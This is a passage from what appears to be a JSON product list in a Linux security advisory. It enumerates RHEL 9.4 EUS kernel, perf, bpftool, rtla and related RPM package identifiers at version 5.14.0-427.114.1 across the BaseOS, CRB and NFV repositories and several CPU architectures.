"BaseOS-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"NFV-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"NFV-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
